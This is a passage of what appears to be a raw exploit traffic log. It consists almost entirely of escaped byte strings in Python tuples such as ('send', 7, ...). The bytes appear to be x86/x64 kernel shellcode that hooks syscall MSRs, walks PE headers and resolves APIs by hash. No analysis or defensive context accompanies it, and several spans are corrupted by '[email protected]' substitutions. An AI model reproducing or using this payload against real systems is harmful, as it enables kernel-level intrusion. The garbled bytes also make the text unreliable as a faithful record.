c2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 7, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\
x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\
x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5